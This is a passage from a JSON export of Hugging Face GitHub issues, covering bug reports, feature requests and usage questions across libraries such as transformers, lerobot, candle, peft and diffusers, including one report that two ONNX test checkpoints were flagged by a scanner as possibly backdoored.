Motivation\n\nThe Hugging Face Hub dataset viewer displays a column named **\"Subset\"**, which refers to what is currently technically called config_name in the datasets library. This inconsistency has caused confusion for many users, especially those unfamiliar with the internal terminology.\n\nI have repeatedly received questions from users trying to understand what \"config\" means, and why it doesn\u2019t match what they see as \"subset\" on the Hub. Renaming everything to `subset_name` might be too disruptive, but introducing subset_name as a clear alias for config_name could significantly improve user experience without breaking backward compatibility.\n\nThis change would:\n- Align terminology across the Hub UI and datasets codebase\n- Reduce user confusion, especially for newcomers\n- Make documentation and examples more intuitive\n", "url": "https://github.com/huggingface/datasets/issues/7637", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-06-24T12:49:01Z", "updated_at": "2025-07-01T16:08:33Z", "comments": 4, "user": "albertvillanova" }, { "repo": "huggingface/candle", "number": 3003, "title": "Build for multiple arch?", "body": "CUDA_COMPUTE_CAP=\"90,100,121\" ??", "url": "https://github.com/huggingface/candle/issues/3003", "state": "open", "labels": [], "created_at": "2025-06-23T13:17:45Z", "updated_at": "2025-06-23T13:17:45Z", "comments": 0, "user": "johnnynunez" }, { "repo": "huggingface/transformers", "number": 38984, "title": "QA pipeline prediction generates wrong response when `top_k` param > 1", "body": "### System Info\n\n- `transformers` version: 4.53.0.dev0\n- Platform: Linux-5.4.0-1128-aws-fips-x86_64-with-glibc2.31\n- Python version: 3.11.11\n- Huggingface_hub version: 0.33.0\n- Safetensors version: 0.5.3\n- Accelerate version: 1.8.1\n- Accelerate config: \tnot found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.7.1+cu126 (NA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```\nimport transformers\n\narchitecture = \"csarron/mobilebert-uncased-squad-v2\"\ntokenizer = transformers.AutoTokenizer.from_pretrained(architecture, low_cpu_mem_usage=True)\nmodel = transformers.MobileBertForQuestionAnswering.from_pretrained(\n architecture, low_cpu_mem_usage=True\n)\npipeline = transformers.pipeline(task=\"question-answering\", model=model, tokenizer=tokenizer)\n\n\ndata = [\n {'question': ['What color is it?', 'How do the people go?', \"What does the 'wolf' howl at?\"],\n 'context': [\n \"Some people said it was green but I know that it's pink.\",\n 'The people on the bus go up and down. Up and down.',\n \"The pack of 'wolves' stood on the cliff and a 'lone wolf' howled at the moon for hours.\"\n ]}\n]\n\n# prediction result is wrong\npipeline(data, top_k=2, max_answer_len=5)\n```\n### Expected behavior\n\nExpected prediction response:\n\n```\n[[{'score': 0.5683297514915466, 'start': 51, 'end': 55, 'answer': 'pink'}, {'score': 0.028800610452890396, 'start': 51, 'end': 56, 'answer': 'pink.'}], [{'score': 0.3008899986743927, 'start': 25, 'end': 36, 'answer': 'up and down'}, {'score': 0.12070021033287048, 'start': 38, 'end': 49, 'answer': 'Up and down'}], [{'score': 0.8356598615646362, 'start': 68, 'end': 76, 'answer': 'the moon'}, {'score': 0.0971309095621109, 'start': 72, 'end': 76, 'answer': 'moon'}]]\n```\nBut it gets the following response (**one 'Up and down' answer is missing** )\n\n```\n[[{'score': 0.5683297514915466, 'start': 51, 'end': 55, 'answer': 'pink'}, {'score': 0.028800610452890396, 'start': 51, 'end': 56, 'answer': 'pink.'}], {'score': 0.4215902090072632, 'start': 25, 'end': 36, 'answer': 'up and down'}, [{'score': 0.8356598615646362, 'start': 68, 'end': 76, 'answer': 'the moon'}, {'score': 0.0971309095621109, 'start': 72, 'end': 76, 'answer': 'moon'}]]\n```", "url": "https://github.com/huggingface/transformers/issues/38984", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-23T13:09:23Z", "updated_at": "2025-07-17T08:24:31Z", "comments": 4, "user": "WeichenXu123" }, { "repo": "huggingface/lighteval", "number": 822, "title": "Documenting how to launch multilingual tasks", "body": "Atm, need to use custom tasks to launch them, must be documented", "url": "https://github.com/huggingface/lighteval/issues/822", "state": "open", "labels": [], "created_at": "2025-06-23T11:10:13Z", "updated_at": "2025-09-03T15:28:42Z", "user": "clefourrier" }, { "repo": "huggingface/candle", "number": 3002, "title": "Is there a roadmap or intention to support CUDA Graph?", "body": "vLLM v1 uses CUDA Graph to capture the execution workflow of the entire model, resulting in significant performance improvements compared to the previous version. I'm wondering if there are any plans to support CUDA Graph in Candle. Would it be possible to add `start_capture`, `end_capture`, and `replay` to the `Module` so that the captured graph can be replayed within the forward method? @LaurentMazare \n\nEric may also be interested in this @EricLBuehler ", "url": "https://github.com/huggingface/candle/issues/3002", "state": "open", "labels": [], "created_at": "2025-06-23T10:11:12Z", "updated_at": "2025-09-06T14:04:53Z", "comments": 4, "user": "guoqingbao" }, { "repo": "huggingface/transformers", "number": 38977, "title": "LMHead is processing redundant tokens in prefill", "body": "While using `GPT2LMHeadModel.generate()` and compare its performance with vLLM, I noticed a significant inefficiency in the `forward()` implementation of many huggingface models. For example, in the `GPT2LMHeadModel.forward`, `self.lm_head` is applied to all token hidden states, even when called from the `generate()` method, where only the logits of the last token are needed for next-token prediction. This computes logits over the entire sequence and can introduce significant overhead.\n\n```py\n# src/transformers/models/gpt2/modeling_gpt2.py, line 1233\nlm_logits = self.lm_head(hidden_states)\n```\n\nSuggested Fix: add a conditional branch in forward() to slice the hidden states before computing logits if it\u2019s a generation step.", "url": "https://github.com/huggingface/transformers/issues/38977", "state": "closed", "labels": [], "created_at": "2025-06-23T08:32:22Z", "updated_at": "2025-06-25T08:29:02Z", "comments": 3, "user": "null-pointer-access" }, { "repo": "huggingface/lerobot", "number": 1369, "title": "The performance of SmolVLA on LIBERO cannot be replicated", "body": "I trained SmolVLA from scratch on the LIBERO dataset (the LIBERO dataset under Lerobot), but during the test, I couldn't reproduce its results in the paper. Could there be a problem with my reproduction code or process? Could you produce a version of the reproduction tutorial?", "url": "https://github.com/huggingface/lerobot/issues/1369", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-06-23T07:38:52Z", "updated_at": "2025-10-07T19:58:50Z", "user": "hahans" }, { "repo": "huggingface/transformers", "number": 38970, "title": "Global and Local Anomaly co-Synthesis Strategy (GLASS)", "body": "### Model description\n\nHi \ud83e\udd17 Transformers team,\n\nI would like to contribute a new model to the library:\nGLASS \u2013 A Unified Anomaly Synthesis Strategy with Gradient Ascent for Industrial Anomaly Detection and Localization\n\n\ud83d\udcc4 Paper: https://arxiv.org/abs/2407.09359\n\n\ud83d\udcbb Code: https://github.com/cqylunlun/GLASS\n\nGLASS is a novel approach for industrial anomaly detection. It uses gradient ascent in the latent space to synthesize diverse and controllable anomalies, which improves both detection and localization. I believe this model could be valuable for users working on visual inspection and quality control tasks in manufacturing and related domains.\n\nWould the maintainers be interested in having this model integrated into Transformers? If so, I\u2019d be happy to start working on a PR.\n\nLooking forward to your feedback!\n\n### Open source status\n\n- [x] The model implementation is available\n- [ ] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/38970", "state": "closed", "labels": [ "New model" ], "created_at": "2025-06-22T12:28:19Z", "updated_at": "2025-06-23T20:55:16Z", "comments": 2, "user": "sbrzz" }, { "repo": "huggingface/smolagents", "number": 1467, "title": "How can I add prompt words in the most elegant way to make the final answer of agents in Chinese or all the reasoning text displayed on gradio in a specific language of a certain one", "body": "How can I add prompt words in the most elegant way to make the final answer of agents in Chinese or all the reasoning text displayed on gradio in a specific language of a certain one?", "url": "https://github.com/huggingface/smolagents/issues/1467", "state": "closed", "labels": [ "enhancement" ], "created_at": "2025-06-22T07:34:13Z", "updated_at": "2025-06-22T10:49:30Z", "user": "ShelterWFF" }, { "repo": "huggingface/transformers", "number": 38965, "title": "Modernbert implementation with Tensorflow", "body": "Hi all! \n I've noticed that ModernBERT [does not have an implementation in tensorflow](https://github.com/huggingface/transformers/issues/37128#issuecomment-2766235185) and I was looking into it. \n\nI'm checking this https://huggingface.co/docs/transformers/main/add_tensorflow_model and I noticed that it's talking about `modelling_modelname.py`, however at the head of the file `modeling_modernbert.py` there is a warning saying \n\n```\n# \ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\n# This file was automatically generated from src/transformers/models/modernbert/modular_modernbert.py.\n# Do NOT edit this file manually as any edits will be overwritten by the generation of\n# the file from the modular. If any change should be done, please apply the change to the\n# modular_modernbert.py file directly. One of our CI enforces this.\n# \ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\ud83d\udea8\n# Copyright 2024 Answer.AI, LightOn, and contributors, and the HuggingFace Inc. team. All rights reserved.\n#\n```\n\nWhat does that means and is there any other implementation having the same principles? \n\n### Motivation\n\nI need Modernbert to work with [DeLFT](https://github.com/kermitt2/delft) through huggingface, and the implementation is mainly tensorflow there. \n\n### Your contribution\n\nI would like to propose a PR but I need a little bit of help in starting up. ", "url": "https://github.com/huggingface/transformers/issues/38965", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-06-21T18:52:50Z", "updated_at": "2025-06-23T15:17:50Z", "comments": 2, "user": "lfoppiano" }, { "repo": "huggingface/lerobot", "number": 1361, "title": "Nvidia Gr00t", "body": "Hi,\n\nAre there any plans to integrate Nvidia Gr00t policy?", "url": "https://github.com/huggingface/lerobot/issues/1361", "state": "open", "labels": [ "enhancement", "question", "policies" ], "created_at": "2025-06-21T10:42:07Z", "updated_at": "2025-08-20T13:34:30Z", "user": "AbdElRahmanFarhan" }, { "repo": "huggingface/lerobot", "number": 1360, "title": "Homing offset not taken into account during calibration", "body": "### System Info\n\n```Shell\nAs of lerobot commit `c940676bdda5ab92e3f9446a72fafca5c550b505`. Other system information is irrelevant for this issue.\n```\n\n### Information\n\n- [x] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nIn `lerobot/common/motors/feetech/feetech.py` in:\n```\n@property\ndef is_calibrated(self) -> bool:\n motors_calibration = self.read_calibration()\n if set(motors_calibration) != set(self.calibration):\n return False\n\n same_ranges = all(\n self.calibration[motor].range_min == cal.range_min\n and self.calibration[motor].range_max == cal.range_max\n for motor, cal in motors_calibration.items()\n )\n if self.protocol_version == 1:\n return same_ranges\n\n same_offsets = all(\n self.calibration[motor].homing_offset == cal.homing_offset\n for motor, cal in motors_calibration.items()\n )\n return same_ranges and same_offsets\n```\n\nInstead of having:\n```\nsame_offsets = all(\n self.calibration[motor].homing_offset == cal.homing_offset\n for motor, cal in motors_calibration.items()\n)\n```\nThe `homing_offset` should be used to adjust the offset in `range_min` and `range_max`. With the current implementation, if I disconnect the two robots from the power outlet and my USB hub and reconnect them afterwards, the `Min_Position_Limit`, `Max_Position_Limit` and `Homing_Offset` values change, forcing me to recalibrate each time since `same_offsets` and `same_ranges` are invalidated. \n\nThe reason I'm not doing this myself is that I don't have enough knowledge to make sure I don't physically break anything while trying to fix it (since I run the risk of having my motors going sideways).\n\n\n### Expected behavior\n\nI expect to not have to recalibrate each time I disconnect my SO-100 arms from the outlet.", "url": "https://github.com/huggingface/lerobot/issues/1360", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-06-21T01:28:04Z", "updated_at": "2025-08-12T09:57:27Z", "user": "godardt" }, { "repo": "huggingface/lerobot", "number": 1359, "title": "Not clear how to setup a basic interactive simulator demo", "body": "Before buying the real robot most people would want to run a visual, interactive demo in the simulator. \n\nA demo should provide: \n - A trained model on the Franka robot\n - an intuitive way to interact with the cube using the mouse (e.g. drag, move, or \u201ckick\u201d it around) so we can see the robot chasing the cube.\n\nMany thanks\n", "url": "https://github.com/huggingface/lerobot/issues/1359", "state": "closed", "labels": [ "question", "simulation" ], "created_at": "2025-06-20T14:12:17Z", "updated_at": "2025-10-09T21:49:19Z", "user": "aguaviva" }, { "repo": "huggingface/optimum", "number": 2300, "title": "Support for EuroBERT models", "body": "### Feature request\n\nI would like to export and optimize the [EuroBERT models](https://huggingface.co/collections/EuroBERT/eurobert-67ceb6c01804878b1f7999c6).\n\nCurrently, it doesn't seem to be possible. When I run :\n\n```python\nfrom optimum.onnxruntime import ORTModelForSequenceClassification\n\nonnx_model = ORTModelForSequenceClassification.from_pretrained(\n \"EuroBERT/EuroBERT-210m\",\n export=True,\n trust_remote_code=True,\n)\n```\n\nHere is the output I got:\n```\nValueError: Trying to export a eurobert model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type eurobert to be supported natively in the ONNX export.\n```\n\nEnvironment Specs:\n- Python Version: 3.11.10\n- Optimum Version: 1.26.1\n\nAre you planning to support these models? \n\n### Motivation\n\n[EuroBERT models](https://huggingface.co/collections/EuroBERT/eurobert-67ceb6c01804878b1f7999c6) are modern multilingual encoder models that work well when adapted to several multilingual tasks (classification, NER, retrieval...).\n\n### Your contribution\n\nI can try to add them if you are not planning to do it.", "url": "https://github.com/huggingface/optimum/issues/2300", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-06-20T12:35:46Z", "updated_at": "2025-08-21T02:11:39Z", "comments": 2, "user": "antonioloison" }, { "repo": "huggingface/peft", "number": 2601, "title": "How to Load Adapters with Per-Layer Variable Shapes in `PeftModel.from_pretrained`", "body": "### Feature request\n\nHi PEFT team,\n\nThank you for the great work on the PEFT library!\n\nI'm working on an extension to LoKrConfig that supports layer-wise adapters with different internal shapes. Specifically:\n\n- Each **adapter assigned to a layer** (e.g., adapter for layer A vs. layer B) may have a different shape.\n- These shapes are **fixed during training**, but vary across layers depending on, for example, the local hidden size or other heuristics.\n- For instance, the adapter weights might have shapes like `[2, 64, 64], [2, 64, 64]` for one layer and `[1, 86, 64], [1, 128, 64]` for another.\n\nThis creates a challenge at load time (`PeftModel.from_pretrained`), since the current mechanism assumes a uniform adapter shape derived from the config and pre-registers all adapter modules before loading weights.\n\nTo support such per-layer dynamic shapes, I see two possible approaches:\n\n1. **Record the shape of each layer\u2019s adapter in the config**, so that empty adapters can be registered with the correct shape before copying weights.\n2. **Bypass the current registration step**, and instead directly load the adapter weights, then dynamically construct and register the modules with the appropriate shape.\n\nMy questions:\n\n1. Is either of these approaches supported or recommended?\n2. What parts of the PEFT codebase need to be extended (e.g., config, adapter registration logic, loading flow)?\n3. Is there an existing workaround or prior art within PEFT for handling per-layer shape variation like this?\n\n\nThanks again for your work!\n\n### Your contribution\n\nI'd be happy to contribute a patch if this is a use case worth supporting more broadly.", "url": "https://github.com/huggingface/peft/issues/2601", "state": "closed", "labels": [], "created_at": "2025-06-20T11:11:19Z", "updated_at": "2025-06-21T05:42:58Z", "user": "yuxuan-z19" }, { "repo": "huggingface/diffusers", "number": 11762, "title": "Could you help fix the backdoor vulnerability caused by two risky pre-trained models used in this repo?", "body": "### Describe the bug\n\nHi, @patrickvonplaten, @sayakpaul, I'd like to report that two potentially risky pretrained models are being used in this project, which may pose **backdoor threats**.Please check the following code example:\n\n### Reproduction\n\n\u2022 **tests/pipelines/stable_diffusion/test_onnx_stable_diffusion_upscale.py**\n\n```python\nclass OnnxStableDiffusionUpscalePipelineFastTests(OnnxPipelineTesterMixin, unittest.TestCase):\n # TODO: is there an appropriate internal test set?\n hub_checkpoint = \"ssube/stable-diffusion-x4-upscaler-onnx\"\n```\n\n```python\ndef test_pipeline_default_ddpm(self):\n pipe = OnnxStableDiffusionUpscalePipeline.from_pretrained(self.hub_checkpoint, provider=\"CPUExecutionProvider\")\n pipe.set_progress_bar_config(disable=None)\n\n inputs = self.get_dummy_inputs()\n image = pipe(**inputs).images\n image_slice = image[0, -3:, -3:, -1].flatten()\n```\n\n\n\n\u2022 **tests/pipelines/stable_diffusion/test_onnx_stable_diffusion_img2img.py**\n\n```python\nclass OnnxStableDiffusionImg2ImgPipelineFastTests(OnnxPipelineTesterMixin, unittest.TestCase):\n hub_checkpoint = \"hf-internal-testing/tiny-random-OnnxStableDiffusionPipeline\"\n```\n\n```python\ndef test_pipeline_default_ddim(self):\n pipe = OnnxStableDiffusionImg2ImgPipeline.from_pretrained(self.hub_checkpoint, provider=\"CPUExecutionProvider\")\n pipe.set_progress_bar_config(disable=None)\n\n inputs = self.get_dummy_inputs()\n image = pipe(**inputs).images\n image_slice = image[0, -3:, -3:, -1].flatten()\n```\n\n#### \n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nOn windows\n\n### Who can help?\n\n#### **Issue Description**\n\nAs shown above, in the **test_on_stable_diffusion_upscale.py file**, the model **\"ssube/stable-diffusion-x4-upscaler-onnx\"** is used as the default model parameter in the `from_pretrained()` method of the `OnnxStableDiffusionUpscalePipeline` class in the diffusers library. Running the relevant instance method will automatically download and load this model. Later, the `pipe(**input)` method is used to execute the model. Similarly, in the **test_onnx_stable_diffusion_img2img.py file**, the model **\"hf-internal-testing/tiny-random-OnnxStableDiffusionPipeline\"** is also automatically downloaded, loaded, and executed.\n\n \n\nAt the same time, [the first model](https://huggingface.co/ssube/stable-diffusion-x4-upscaler-onnx/tree/main) and the [second model](https://huggingface.co/hf-internal-testing/tiny-random-OnnxStableDiffusionPipeline/tree/main) are **flagged as risky** on the HuggingFace platform. The `model.onnx` files in these models are marked as risky and may trigger **backdoor threats**. For certain specific inputs, the backdoor in the models could be activated, effectively altering the model's behavior.\n\n![Image](https://github.com/user-attachments/assets/facaff80-d2ca-45e3-bf94-5698df511dcd)\n\n![Image](https://github.com/user-attachments/assets/45f47a6d-3079-474a-ad52-867d5279261c)\n\n**Related Risk Reports:**\uff1a[ssube/stable-diffusion-x4-upscaler-onnx risk report ](https://protectai.com/insights/models/ssube/stable-diffusion-x4-upscaler-onnx/cc4d9dc5a0d94a8245f15e970ac6be642c7b63cc/overview) and [hf-internal-testing/tiny-random-OnnxStableDiffusionPipeline risk report ](https://protectai.com/insights/models/hf-internal-testing/tiny-random-OnnxStableDiffusionPipeline/a42f662ec86a14033aa8894b954225fa07905134/overview) \n\n \n\n#### Suggested Repair Methods\n\n1. Replace these models with safer official alternatives, such as `stabilityai/stable-diffusion-x4-upscaler` and `stabilityai/stable-diffusion-2-inpainting` (or other models). If specific functionalities cannot be achieved, you may convert these models to ONNX format and substitute them accordingly.\n2. If replacement is not feasible, please include a warning about potential security risks when instantiating the relevant classes.\n3. Visually inspect the model using OSS tools like Netron. If no issues are found, report the false threat to the scanning platform\n\nAs one of the most popular machine learning libraries(**star:29.4k**), **every potential risk could be propagated and amplified**. Could you please address the above issues?\n\nThanks for your help~\n\nBest regards,\nRockstars", "url": "https://github.com/huggingface/diffusers/issues/11762", "state": "open", "labels": [ "bug" ], "created_at": "2025-06-20T09:31:50Z", "updated_at": "2025-06-23T05:25:22Z", "comments": 2, "user": "Rockstar292" }, { "repo": "huggingface/transformers", "number": 38927, "title": "Can't load my LoRA checkpoint after gemma3 refactor", "body": "### System Info\n\n- `transformers` version: 4.52.4\n- Platform: Linux-6.8.0-1029-aws-x86_64-with-glibc2.35\n- Python version: 3.10.15\n- Huggingface_hub version: 0.32.2\n- Safetensors version: 0.4.3\n- Accelerate version: 1.6.0\n- Accelerate config: \tnot found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: yes but not relevant here, it happens on single gpu too\n- Using GPU in script?: yes but same error on cpu only\n- GPU type: NVIDIA L40S\n\n### Who can help?\n\nHi @ArthurZucker and @zucchini-nlp \n\nI am using my own implementation of `Gemma3ForConditionalGeneration`. I was using transformers 4.50 for a while and upgraded to 4.52.4. After the update I realised that the `Gemma3ForConditionalGeneration` implementation had changed. Mostly `self.language_model` became `self.model`.\n\nThe issue is that when I use `PeftModel.from_pretrained` on my old LoRA checkpoint, it can't find the weights and I get a bunch of\n```\nFound missing adapter keys while loading the checkpoint: ['base_model.model.model.language_model.layers.0.self_attn.q_proj.lora_A.default.weight', 'base_model.model.model.language_model.layers.0.self_attn.q_proj.lora_B.default.weight', ...\n```\nI thought the `_checkpoint_conversion_mapping` [attribute](https://github.com/huggingface/transformers/blob/v4.52.4/src/transformers/models/gemma3/modeling_gemma3.py#L1236) would be enough but it isn't. Is there an easy way I can still use my old checkpoint?\n\nThanks in advance for you help, I really appreciate all the effort you guys make and sorry if this was explained somewhere in the documentation!\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nI have custom gemma\n```\nclass MyCustomiGemma(Gemma3ForConditionalGeneration):\n _checkpoint_conversion_mapping = {\n \"^language_model.model\": \"model.language_model\",\n \"^vision_tower\": \"model.vision_tower\",\n \"^multi_modal_projector\": \"model.multi_modal_projector\",\n \"^language_model.lm_head\": \"lm_head\",\n }\n\n def __init__(\n self,\n config: Gemma3Config,\n ):\n super().__init__(config)\n\n self.vocab_size = config.text_config.vocab_size\n\n self.model = Gemma3Model(config)\n self.lm_head = nn.Linear(\n config.text_config.hidden_size, config.text_config.vocab_size, bias=False\n )\n\n self.another_head = nn.Linear(...)\n\n self.post_init()\n```\n\nWhen using \n```\nbase_model = MyCustomiGemma.from_pretrained()\nmodel = PeftModel.from_pretrained(\n base_model,\n checkpoint_path,\n is_trainable=True,\n )\n```\n\nI get the `Found missing adapter keys while loading the checkpoint:` warning for all my LoRAs\n\n### Expected behavior\n\nI think the issue is just a name mapping and I thought it be backwards compatible", "url": "https://github.com/huggingface/transformers/issues/38927", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-20T06:59:34Z", "updated_at": "2025-10-07T18:53:15Z", "comments": 12, "user": "jood-canva" }, { "repo": "huggingface/mcp-course", "number": 119, "title": "How to preview the project locally?", "body": "I'm trying to preview the project locally to see my changes and contribute to the project. But when executing the script the following errors is triggered.\n\nError:\n![Image](https://github.com/user-attachments/assets/b9a47af1-e28e-4175-8c33-7ed2aac9121b)\n\nPreview:\n![Image](https://github.com/user-attachments/assets/2b140628-485f-4bd3-bc26-f3b083ae92de)\n\nThere is a correct way to run and preview the project?", "url": "https://github.com/huggingface/mcp-course/issues/119", "state": "closed", "labels": [], "created_at": "2025-06-20T01:05:46Z", "updated_at": "2025-09-23T17:29:13Z", "user": "arimariojesus" }, { "repo": "huggingface/transformers", "number": 38924, "title": "Exporting Llava decoder into ONNX format", "body": "I am working on exporting Llava into ONNX format. I came across this previous issue: https://github.com/huggingface/transformers/issues/33637 which had a notebook that outlined how to export in three separate parts. I noticed there wasn't any actual code on how the decoder was exported unlike the other two components. Does anyone know how they were able to export the decoder in the original notebook?\n\nNotebook: https://colab.research.google.com/drive/1IhC8YOV68cze0XWGfuqSclnVTt_FskUd?usp=sharing", "url": "https://github.com/huggingface/transformers/issues/38924", "state": "closed", "labels": [], "created_at": "2025-06-19T23:32:47Z", "updated_at": "2025-08-12T08:03:14Z", "comments": 10, "user": "EricJi150" }, { "repo": "huggingface/transformers", "number": 38918, "title": "Lack of IDE-Specific Authentication Instructions in Hugging Face \"Quickstart\" Documentation", "body": "Explanation:\n\nI\u2019m currently exploring the Transformers library and want to understand its architecture in order to make meaningful contributions. I started with the Quickstart page, particularly the setup section, which provides instructions for getting started with the Hugging Face Hub.\n\nHowever, I noticed that the documentation appears to be primarily tailored for users working in Jupyter notebooks. The instructions for authentication (using notebook_login()) seem to assume that the user is running code within a notebook environment. As someone who is working in PyCharm (and possibly others working in VS Code or other IDEs), I found that there is no clear guidance for authenticating via these IDEs.\n\nIt would be helpful to explicitly mention how users working in an IDE like PyCharm or VS Code should authenticate. Specifically, using huggingface-cli for authentication in a non-notebook environment could be a good solution. Providing a simple, clear guide on how to authenticate via the CLI or within the IDE would greatly improve the documentation.\n\nSuggestion:\n\nI recommend updating the documentation to include a section specifically addressing authentication when working in IDEs like PyCharm or VS Code. \n\nPlease let me know if this suggestion makes sense or if you need any further clarification before I proceed with the update.\n", "url": "https://github.com/huggingface/transformers/issues/38918", "state": "closed", "labels": [], "created_at": "2025-06-19T17:16:32Z", "updated_at": "2025-06-24T18:48:17Z", "comments": 4, "user": "marcndo" }, { "repo": "huggingface/datasets", "number": 7627, "title": "Creating a HF Dataset from lakeFS with S3 storage takes too much time!", "body": "Hi,\n\nI\u2019m new to HF dataset and I tried to create datasets based on data versioned in **lakeFS** _(**MinIO** S3 bucket as storage backend)_\n\nHere I\u2019m using \u00b130000 PIL image from MNIST data however it is taking around 12min to execute, which is a lot!\n\nFrom what I understand, it is loading the images into cache then building the dataset.\n\u2013 Please find bellow the execution screenshot \u2013\n\nIs there a way to optimize this or am I doing something wrong?\n\nThanks!\n\n![Image](https://github.com/user-attachments/assets/c79257c8-f023-42a9-9e6f-0898b3ea93fe)", "url": "https://github.com/huggingface/datasets/issues/7627", "state": "closed", "labels": [], "created_at": "2025-06-19T14:28:41Z", "updated_at": "2025-06-23T12:39:10Z", "comments": 1, "user": "Thunderhead-exe" }, { "repo": "huggingface/lerobot", "number": 1351, "title": "Need help about dataset and train.", "body": "# What this for\n\nAttracted by smolvla, and new to smolvla_base, and i am now trying to ask few questions before a try with this model.\n\nSeveral parts: \n1) dataset\n2) simulation\n3) real world\n\n## dataset\n### Two cameras ?\nI have read three datasets, including \nhttps://huggingface.co/datasets/lerobot/svla_so101_pickplace\nhttps://huggingface.co/datasets/Marlboro1998/starai02\n\nand its structure shows: \nvideos/chunks/ two foldes with .mp4 files, each is one camera.\n\nhttps://huggingface.co/datasets/unitreerobotics/Z1_DualArmStackBox_Dataset\n\nI find that the data in unitree dataset is with one camera\n\ndoes it mean that it is not necessary with two cameras? \n\n**if one camera** is possible to build dataset. Where and how should i change the code to build the dataset and to train with it? \n\n**if two cameras are min demand**, is it possible i make it with random position? like one is in-hand, and one is some where else, because it might be hard to real put it everytime in the same position ( for some work)\n\n### depth data?\nI have one realsense camera with depth data. how should i deal with it in dataset? only with color frame?\n\n### video length\nI have watch several videos in svla_so101_pickplace, and each is with 10s. I understand that this is because such shot video contains a complete task. \n\nhow about a work might be long and complex? break it down into n parts so you will get n +1 (break down + full) tasks and then train with it?\n\n\n## simulation\n\n### simulation env\ni got some basic understanding in this part. I used few times with mujoco and isaac sim. just start to try with lerobot. \n\nIs it possible output to mujoco or isaac sim? I understand these are two might not relate to lerobot, sorry if anything wrong.\n\n### simulation of different robot\nThis is something relating to train. How can i record a dataset for custom robot? I have read some dataset like for unitree, but like how to record in simulate and with custom robot?\n\nI have not yet deep read the documentation with lerobot, so if there is any doc can help this, could you share some information.\n\n\n# real world\n\nif i try to train with other robot, but with few dataset ( because less community data and self-collection data) , i think its performance would not be as good as those in your paper. so how many data do you think necessary for such situation ( robot different from paper)\n\n\nThanks a lot for your consideration. Forgive me if anything wrong in my text above.\n\n", "url": "https://github.com/huggingface/lerobot/issues/1351", "state": "closed", "labels": [ "question", "policies", "dataset" ], "created_at": "2025-06-19T04:03:43Z", "updated_at": "2025-10-17T11:47:56Z", "user": "hbj52152" }, { "repo": "huggingface/candle", "number": 2997, "title": "Implement Conv3D support for compatibility with Qwen-VL and similar models", "body": "Several vision-language models such as Qwen-VL and its variants make use of 3D convolution layers (Conv3D) in their architecture, especially for handling video or temporal spatial data. Currently, Candle does not support Conv3D operations, which makes it impossible to run or port such models natively.\n\nIn order to support these models and ensure broader compatibility with existing open-source architectures, it would be beneficial to implement Conv3D in Candle as a fundamental operation.\n\nThis will enable:\n\n- Native execution of Qwen-VL-style models\n- Proper handling of video or spatio-temporal data inputs\n- Compatibility with pretrained weights relying on Conv3D layers\n\nLooking forward to discussion and suggestions on how best to approach this implementation.\n", "url": "https://github.com/huggingface/candle/issues/2997", "state": "open", "labels": [], "created_at": "2025-06-19T02:57:20Z", "updated_at": "2025-10-10T16:51:20Z", "comments": 1, "user": "maximizemaxwell" }, { "repo": 